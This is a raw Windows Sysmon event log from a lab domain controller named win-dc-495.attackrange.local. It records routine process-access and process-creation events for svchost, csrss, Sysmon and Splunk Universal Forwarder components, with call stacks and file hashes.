13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:44.661{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8FDC-6005-0101-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.661{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FDC-6005-0101-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:44.662{59A5CD1D-8FDC-6005-0101-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.505{59A5CD1D-8FDD-6005-0201-00000000A301}15643896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FDD-6005-0201-00000000A301}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8FDD-6005-0201-00000000A301}1564C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.364{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FDD-6005-0201-00000000A301}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:45.365{59A5CD1D-8FDD-6005-0201-00000000A301}1564C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FDE-6005-0301-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
